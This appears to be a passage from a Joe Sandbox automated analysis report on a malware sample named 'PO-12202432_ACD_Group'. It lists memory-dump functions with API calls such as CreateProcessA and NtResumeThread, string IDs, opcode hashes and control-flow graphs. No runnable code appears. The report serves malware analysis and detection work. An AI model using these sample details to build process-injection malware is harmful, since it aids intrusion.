                                                          Function 067C4B30 Relevance: 1.6, APIs: 1, Instructions: 59nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 067C4BA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: fc68bae8f6f49c2315af9df6d8e3efce8c35abbdbd87e26c4e8869359328a907
                                                          • Instruction ID: ff4c8244d6de661688afbcaf485961853af3049296386049ef6a4b710b03baa0
                                                          • Opcode Fuzzy Hash: fc68bae8f6f49c2315af9df6d8e3efce8c35abbdbd87e26c4e8869359328a907
                                                          • Instruction Fuzzy Hash: 641127B1D002088ECB10DFAAC444BAFFBF8EF59320F50842ED519A3240D779A944CFA1
                                                          Function 067C4B38 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 067C4BA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 0cf49b2296fe3be658a130b76255fe6c93782aec8c456b18ea02749546b2e604
                                                          • Instruction ID: 2a7568688e9cb72182433de28c020ad0773872fca247f84fde3b31fcdf34378a
                                                          • Opcode Fuzzy Hash: 0cf49b2296fe3be658a130b76255fe6c93782aec8c456b18ea02749546b2e604
                                                          • Instruction Fuzzy Hash: F611E7B1D002098EDB10DFAAC444AAEFBF4FF59324F54842ED519A7240CB79A945CFA5
                                                          Function 066A74B0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 37cf08a30079bc70046ff19e0b75e12f0199e38135b69ab3c3308ae922f8db53
                                                          • Instruction ID: 372050a521d484bea75869922bb29f35331b28fedf8540e61e94cd814814c526
                                                          • Opcode Fuzzy Hash: 37cf08a30079bc70046ff19e0b75e12f0199e38135b69ab3c3308ae922f8db53
                                                          • Instruction Fuzzy Hash: 02B1D174E01218CFEB94DFA9D984B9DBBF2BB49305F2090A9D409A7361DB70AD85CF50
                                                          Function 066A74A0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: e60070298e82f8b607ce19bfa493b9c80b302ee8f92f20347f46580d5b57d35c
                                                          • Instruction ID: 6d58542be56bd24df3c87a3e1cf5e9557438b2893e57c951c89aeee02613aa93
                                                          • Opcode Fuzzy Hash: e60070298e82f8b607ce19bfa493b9c80b302ee8f92f20347f46580d5b57d35c
                                                          • Instruction Fuzzy Hash: 77B1E274E01218CFDB94DFA9D984B9DBBF2BB49304F2090A9D409A7361DB70AE85CF50
                                                          Function 067DE308 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 520914dfc043b365e719ac8d5cace8622a54a103747f39f546b4691ca89d9fdb
                                                          • Instruction ID: 9a02a1aa488e6f790727d474e870686707f12bad5dea982a31a8396bf5348663
                                                          • Opcode Fuzzy Hash: 520914dfc043b365e719ac8d5cace8622a54a103747f39f546b4691ca89d9fdb
                                                          • Instruction Fuzzy Hash: E5A15870E04208CFDB95DFA8D884BADB7F2FB49304F50906AE419AB396DB349985CF50
                                                          Function 067DE318 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 3088e995fb71fbe2e11111b8dae19204ca7524e4b876b92c39bbf5751a6e5efa
                                                          • Instruction ID: d51fa19a2139f1868e671ee697fb063337dd2fc2238d2678494a241182cc4830
                                                          • Opcode Fuzzy Hash: 3088e995fb71fbe2e11111b8dae19204ca7524e4b876b92c39bbf5751a6e5efa
                                                          • Instruction Fuzzy Hash: 8FA16870E04208CFDB85DFA8D884BADB7F2FB49304F50906AE419AB396DB349985CF50
                                                          Function 067DE497 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 9913b286d37120342b302c5a8304cab007324d7e0a1d8186461cce0b43971e19
                                                          • Instruction ID: fe0ad62abd2c67c88eed43d41e02647170d8efe9af3ed7d28b9ef12b472bc917
                                                          • Opcode Fuzzy Hash: 9913b286d37120342b302c5a8304cab007324d7e0a1d8186461cce0b43971e19
                                                          • Instruction Fuzzy Hash: 1D913870E05208CFEB95EFA8D484BADB7F2FB49304F50906AE419AB356DB349985CF50
                                                          Function 066A0040 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: J
                                                          • API String ID: 0-1141589763
                                                          • Opcode ID: 6f6ada0411893cdc58bcac29213c3155404c44783196f8bb28dbf1740ac4fb8f
                                                          • Instruction ID: 6ffaa3bdeb65ad0a9af48fce9bd125caec6974557da3c4f5c646ef9d9c82b661
                                                          • Opcode Fuzzy Hash: 6f6ada0411893cdc58bcac29213c3155404c44783196f8bb28dbf1740ac4fb8f
                                                          • Instruction Fuzzy Hash: 283188B1D156288BEB5ACF6BDC4069DFAFBBFC8204F04D1AA950CA6254DB700B818F54
                                                          Function 06AAE2B0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2170523553.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6a90000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PZT
                                                          • API String ID: 0-3004033766
                                                          • Opcode ID: 022f2ce95b19975d43d728507c973b681cb2b955b7dd35be1e7101cb5f80f117
                                                          • Instruction ID: d4b8ec69d20981d0024898e93de5f5dc1f642035671aa8b3a38b7ae884302cc8
                                                          • Opcode Fuzzy Hash: 022f2ce95b19975d43d728507c973b681cb2b955b7dd35be1e7101cb5f80f117
                                                          • Instruction Fuzzy Hash: DF310774A01218CFEB94EF69D855BA9B7F6FB48300F0090AAE50AA7355DB349A84CF41
                                                          Function 0106A041 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2148641823.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1060000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ad125a8d0f6191de43af669432cb04ecb4f3a6f5de0843ed06c794aab3ab4d6
                                                          • Instruction ID: 47daf78e99b095f3184d1d086477bf5050e8281f1686976b9f88a75d646db7e4
                                                          • Opcode Fuzzy Hash: 2ad125a8d0f6191de43af669432cb04ecb4f3a6f5de0843ed06c794aab3ab4d6
                                                          • Instruction Fuzzy Hash: 4751A070E4522CCFFB64DF29C984B99B7B5BB49300F1086EAD449A3251DB309AC5CF55
                                                          Function 0106A067 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2148641823.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1060000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3858249bc93f37f0c5793f2b2a66d9d2ec74d2434a35699ef917bbc78b88f29d
                                                          • Instruction ID: ebed305bc0b236a99aa614f878ae98ea47a48da75b06686d0b2488d771d41b25
                                                          • Opcode Fuzzy Hash: 3858249bc93f37f0c5793f2b2a66d9d2ec74d2434a35699ef917bbc78b88f29d
                                                          • Instruction Fuzzy Hash: 1A51AF70E4522CCFEB68DF29C984B99B7B5BB89300F10C6EAD449A3251DB309AC5CF55
                                                          Function 06609C30 Relevance: 4.2, Strings: 3, Instructions: 479COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1247 6609c30-6609c58 1249 6609ca6-6609cb4 1247->1249 1250 6609c5a-6609ca1 1247->1250 1251 6609cc3 1249->1251 1252 6609cb6-6609cc1 call 6607750 1249->1252 1300 660a0fd-660a104 1250->1300 1254 6609cc5-6609ccc 1251->1254 1252->1254 1257 6609cd2-6609cd6 1254->1257 1258 6609db5-6609db9 1254->1258 1259 660a105-660a12d 1257->1259 1260 6609cdc-6609ce0 1257->1260 1262 6609dbb-6609dca call 6605980 1258->1262 1263 6609e0f-6609e19 1258->1263 1270 660a134-660a15e 1259->1270 1264 6609cf2-6609d50 call 6607490 call 6607ef8 1260->1264 1265 6609ce2-6609cec 1260->1265 1275 6609dce-6609dd3 1262->1275 1266 6609e52-6609e78 1263->1266 1267 6609e1b-6609e2a call 6605128 1263->1267 1307 660a1c3-660a1ed 1264->1307 1308 6609d56-6609db0 1264->1308 1265->1264 1265->1270 1290 6609e85 1266->1290 1291 6609e7a-6609e83 1266->1291 1284 6609e30-6609e4d 1267->1284 1285 660a166-660a17c 1267->1285 1270->1285 1279 6609dd5-6609e0a call 66096f8 1275->1279 1280 6609dcc 1275->1280 1279->1300 1280->1275 1284->1300 1310 660a184-660a1bc 1285->1310 1298 6609e87-6609eaf 1290->1298 1291->1298 1315 6609f80-6609f84 1298->1315 1316 6609eb5-6609ece 1298->1316 1317 660a1f7-660a1fd 1307->1317 1318 660a1ef-660a1f5 1307->1318 1308->1300 1310->1307 1319 6609f86-6609f9f 1315->1319 1320 6609ffe-660a008 1315->1320 1316->1315 1338 6609ed4-6609ee3 call 6604b50 1316->1338 1318->1317 1325 660a1fe-660a23b 1318->1325 1319->1320 1343 6609fa1-6609fb0 call 6604b50 1319->1343 1321 660a065-660a06e 1320->1321 1322 660a00a 1320->1322 1327 660a070-660a09e call 6606ca0 call 6606cc0 1321->1327 1328 660a0a6-660a0f3 1321->1328 1330 660a012-660a014 1322->1330 1327->1328 1348 660a0fb 1328->1348 1336 660a016-660a018 1330->1336 1337 660a01a-660a02c 1330->1337 1344 660a02e-660a030 1336->1344 1337->1344 1356 6609ee5-6609eeb 1338->1356 1357 6609efb-6609f10 1338->1357 1364 6609fb2-6609fb8 1343->1364 1365 6609fc8-6609fd3 1343->1365 1353 660a032-660a036 1344->1353 1354 660a05e-660a063 1344->1354 1348->1300 1359 660a054-660a059 call 6603950 1353->1359 1360 660a038-660a051 1353->1360 1354->1321 1354->1322 1366 6609eed 1356->1366 1367 6609eef-6609ef1 1356->1367 1370 6609f12-6609f3e call 6605df0 1357->1370 1371 6609f44-6609f4d 1357->1371 1359->1354 1360->1359 1373 6609fba 1364->1373 1374 6609fbc-6609fbe 1364->1374 1365->1307 1375 6609fd9-6609ffc 1365->1375 1366->1357 1367->1357 1370->1310 1370->1371 1371->1307 1372 6609f53-6609f7a 1371->1372 1372->1315 1372->1338 1373->1365 1374->1365 1375->1320 1375->1343
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Haq$Haq$Haq
                                                          • API String ID: 0-3013282719
                                                          • Opcode ID: f62b6b6921364f0900494a6583f83f728bf794e70d9594e396fd0103be6d449c
                                                          • Instruction ID: 89bbb06bdaacb3d7419574ed53b4555405d6e0feb46e57382766ef866c83df9d
                                                          • Opcode Fuzzy Hash: f62b6b6921364f0900494a6583f83f728bf794e70d9594e396fd0103be6d449c
                                                          • Instruction Fuzzy Hash: E7126F31A002058FDB68DFA9D884AAEBBF6FF84300F14856DE5069B795DB31EC45CB90
                                                          Function 065C13F0 Relevance: 4.2, Strings: 2, Instructions: 1685COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 81e4d8fd3950e66e93646274b677949ec3d653a0295da97475d3093b5fdf1ef6
                                                          • Instruction ID: d7f2da2ec712cb4097d10b9cc60364934cce00911bf086f6a468f0e2026f20de
                                                          • Opcode Fuzzy Hash: 81e4d8fd3950e66e93646274b677949ec3d653a0295da97475d3093b5fdf1ef6
                                                          • Instruction Fuzzy Hash: 82E290709093899FCB66CBE4CC58BAE7FB5FF46310F14409AE540AB2A2C6745945CFB2
                                                          Function 0660B8E8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1807 660b8e8-660b913 1920 660b915 call 660bdf1 1807->1920 1921 660b915 call 660be08 1807->1921 1808 660b91b-660b925 1809 660b947-660b95d call 660b6f0 1808->1809 1810 660b927-660b92a 1808->1810 1816 660bcd3-660bce7 1809->1816 1817 660b963-660b96f 1809->1817 1923 660b92c call 660c200 1810->1923 1924 660b92c call 660c253 1810->1924 1925 660b92c call 660c257 1810->1925 1926 660b92c call 660c258 1810->1926 1813 660b932-660b934 1813->1809 1814 660b936-660b93e 1813->1814 1814->1809 1827 660bd27-660bd30 1816->1827 1818 660baa0-660baa7 1817->1818 1819 660b975-660b978 1817->1819 1822 660bbd6-660bc13 call 660b0f8 call 660e090 1818->1822 1823 660baad-660bab6 1818->1823 1820 660b97b-660b984 1819->1820 1825 660bdc8 1820->1825 1826 660b98a-660b99e 1820->1826 1866 660bc19-660bcca call 660b0f8 1822->1866 1823->1822 1828 660babc-660bbc8 call 660b0f8 call 660b688 call 660b0f8 1823->1828 1830 660bdcd-660bdd1 1825->1830 1843 660ba90-660ba9a 1826->1843 1844 660b9a4-660ba39 call 660b6f0 * 2 call 660b0f8 call 660b688 call 660b730 call 660b7d8 call 660b840 1826->1844 1831 660bd32-660bd39 1827->1831 1832 660bcf5-660bcfe 1827->1832 1918 660bbd3 1828->1918 1919 660bbca 1828->1919 1837 660bdd3 1830->1837 1838 660bddc 1830->1838 1835 660bd87-660bd8e 1831->1835 1836 660bd3b-660bd7e call 660b0f8 1831->1836 1832->1825 1834 660bd04-660bd16 1832->1834 1854 660bd26 1834->1854 1855 660bd18-660bd1d 1834->1855 1841 660bd90-660bda0 1835->1841 1842 660bdb3-660bdc6 1835->1842 1836->1835 1837->1838 1847 660bddd 1838->1847 1841->1842 1857 660bda2-660bdaa 1841->1857 1842->1830 1843->1818 1843->1820 1899 660ba58-660ba8b call 660b840 1844->1899 1900 660ba3b-660ba53 call 660b7d8 call 660b0f8 call 660b3a8 1844->1900 1847->1847 1854->1827 1927 660bd20 call 660e830 1855->1927 1928 660bd20 call 660e821 1855->1928 1857->1842 1866->1816 1899->1843 1900->1899 1918->1822 1919->1918 1920->1808 1921->1808 1923->1813 1924->1813 1925->1813 1926->1813 1927->1854 1928->1854
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q$4']q
                                                          • API String ID: 0-705557208
                                                          • Opcode ID: b8972b3b5fd455bc1ffefe69bdfa005efd837c78513f5f6428414259449e30ab
                                                          • Instruction ID: 730cc7a723ad0276c93a6f8b767ca0b65a15a769af38169db9bf1c2c6ced8090
                                                          • Opcode Fuzzy Hash: b8972b3b5fd455bc1ffefe69bdfa005efd837c78513f5f6428414259449e30ab
                                                          • Instruction Fuzzy Hash: 3FF1DD34A10218DFDB48DF64D994E9EBBB2FF89300F118168E516AB3A5DB71EC46CB50
                                                          Function 067C26DC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2300 67c26dc-67c2758 2302 67c275a-67c2764 2300->2302 2303 67c2791-67c27b1 2300->2303 2302->2303 2304 67c2766-67c2768 2302->2304 2310 67c27ea-67c2824 2303->2310 2311 67c27b3-67c27bd 2303->2311 2306 67c276a-67c2774 2304->2306 2307 67c278b-67c278e 2304->2307 2308 67c2778-67c2787 2306->2308 2309 67c2776 2306->2309 2307->2303 2308->2308 2312 67c2789 2308->2312 2309->2308 2317 67c285d-67c28d2 CreateProcessA 2310->2317 2318 67c2826-67c2830 2310->2318 2311->2310 2313 67c27bf-67c27c1 2311->2313 2312->2307 2315 67c27e4-67c27e7 2313->2315 2316 67c27c3-67c27cd 2313->2316 2315->2310 2319 67c27cf 2316->2319 2320 67c27d1-67c27e0 2316->2320 2330 67c28db-67c2923 2317->2330 2331 67c28d4-67c28da 2317->2331 2318->2317 2321 67c2832-67c2834 2318->2321 2319->2320 2320->2320 2322 67c27e2 2320->2322 2323 67c2836-67c2840 2321->2323 2324 67c2857-67c285a 2321->2324 2322->2315 2326 67c2844-67c2853 2323->2326 2327 67c2842 2323->2327 2324->2317 2326->2326 2328 67c2855 2326->2328 2327->2326 2328->2324 2336 67c2925-67c2929 2330->2336 2337 67c2933-67c2937 2330->2337 2331->2330 2336->2337 2338 67c292b 2336->2338 2339 67c2939-67c293d 2337->2339 2340 67c2947-67c294b 2337->2340 2338->2337 2339->2340 2341 67c293f 2339->2341 2342 67c294d-67c2951 2340->2342 2343 67c295b 2340->2343 2341->2340 2342->2343 2344 67c2953 2342->2344 2345 67c295c 2343->2345 2344->2343 2345->2345
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 067C28C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: U
                                                          • API String ID: 963392458-3372436214
                                                          • Opcode ID: 220d018aa478f12cf95342b7560c94db8c1c61c337ca4dc6bde9a526f9f154b2
                                                          • Instruction ID: 5860da243147b11b9f1bb45d2ecd90e49d9857bd00276017a6b4167855140d2c
                                                          • Opcode Fuzzy Hash: 220d018aa478f12cf95342b7560c94db8c1c61c337ca4dc6bde9a526f9f154b2
                                                          • Instruction Fuzzy Hash: 61815570D006499FDB50CFA9C8817EEBBF1BF48324F24852DE869A7255D7749982CB81
                                                          Function 065C29D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: fa6665903434b0db4116e02c601dc92dc02b323c3084b6cb028ba2d8c0453bb7
                                                          • Instruction ID: d62086f0aa345cc6099625d73b0d97a5a98ea713f3b0f9e43a641456bf678c94
                                                          • Opcode Fuzzy Hash: fa6665903434b0db4116e02c601dc92dc02b323c3084b6cb028ba2d8c0453bb7
                                                          • Instruction Fuzzy Hash: 5DF1C074D01209EFCB98DFE8E5886ADBBB2FF49325F20442DE50AA7254DB305A85DF41
                                                          Function 01065775 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2148641823.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1060000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q$`Q]q
                                                          • API String ID: 0-2790359648
                                                          • Opcode ID: 914f211d0bf7be359bb34c39945e8cd6e3d2fa9253aa7bcb95483140cbee4477
                                                          • Instruction ID: 630423ae3693773b0e4e9cc02114cd1d9eccd2abc1fbab144987eed10b8a298e
                                                          • Opcode Fuzzy Hash: 914f211d0bf7be359bb34c39945e8cd6e3d2fa9253aa7bcb95483140cbee4477
                                                          • Instruction Fuzzy Hash: 6EB1E2B4D45229CFDB60CF28DD48BADB7B5BB49351F0080EAD689A7290DB741AC4CF19
                                                          Function 065C3968 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: a88c1ea1b4b89fe92f9fbdb17ca2661b72db3a0194dbd2dd4e68969275134d1f
                                                          • Instruction ID: 227b274f59b59363718ff1644189e2ce2a435aee5d204bcaab810fd08ab254cd
                                                          • Opcode Fuzzy Hash: a88c1ea1b4b89fe92f9fbdb17ca2661b72db3a0194dbd2dd4e68969275134d1f
                                                          • Instruction Fuzzy Hash: 3591DC34E00208DFCB98DFE9D998AECBBB2BF89325F109529D526B7250CB355845CF61
                                                          Function 06607D11 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq
                                                          • API String ID: 0-3916115647
                                                          • Opcode ID: 6130d46dd660f8f633d605bb7ef3f066cd751d03b1bc95fd2b42b6d30242d64d
                                                          • Instruction ID: e86317a0586d713d6dbbab3da08b9a6a5a3e4cfb7d24e9ba46a292e4c0153f30
                                                          • Opcode Fuzzy Hash: 6130d46dd660f8f633d605bb7ef3f066cd751d03b1bc95fd2b42b6d30242d64d
                                                          • Instruction Fuzzy Hash: 4251AB317002458FDB599F29E854AAF3BA6EF84311F10847AE905CB395CF35ED46C7A1
                                                          Function 06605780 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          • Opcode ID: f0cfc8c5b49204102b7caf049b4b76992cd965554612d625fb200c06d158d566
                                                          • Instruction ID: 33dac30344b9032d4978786e016ba2afd0cc7528998bf74cd7421886935da80e
                                                          • Opcode Fuzzy Hash: f0cfc8c5b49204102b7caf049b4b76992cd965554612d625fb200c06d158d566
                                                          • Instruction Fuzzy Hash: 14516730B002158FD759AF28C45892EBBB6FF8530171488ADE946CB3A5CF35ED06CBA1
                                                          Function 06601E20 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$`A
                                                          • API String ID: 0-322524450
                                                          • Opcode ID: 7284948ffae59f02c74857e801560cd733e74cedb72fac5e896cdb0f9ce680ea
                                                          • Instruction ID: 91f03ce66f622b13534a653cc77bf1b3bb446aee8e066fc2aad016adc9844144
                                                          • Opcode Fuzzy Hash: 7284948ffae59f02c74857e801560cd733e74cedb72fac5e896cdb0f9ce680ea
                                                          • Instruction Fuzzy Hash: F031F6367041456BDB195F6DE8509AFBFAAEFC6360B14803AF904CB391CE329C15C7A0
                                                          Function 06A93BF9 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2170523553.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6a90000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$0M
                                                          • API String ID: 0-3844039254
                                                          • Opcode ID: 1e96173c65fcd46ce2ef1ce2134d0d376173f8e019e46812c124d50d4219c043
                                                          • Instruction ID: 200c79d57a5634d3eb90a80292b924e925f81a0a6b38e327e09a1915de4339c3
                                                          • Opcode Fuzzy Hash: 1e96173c65fcd46ce2ef1ce2134d0d376173f8e019e46812c124d50d4219c043
                                                          • Instruction Fuzzy Hash: 7911F7B4A411298FDBA4DF28C994ACDB7F1EB4D310F1080E9E90DA3385CA309E858F25
                                                          Function 065C13A5 Relevance: 2.4, Strings: 1, Instructions: 1185COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: cdaec5cff03ed5049dff813b311f7c81c417e0f1d82c02e1c90560ad921829f8
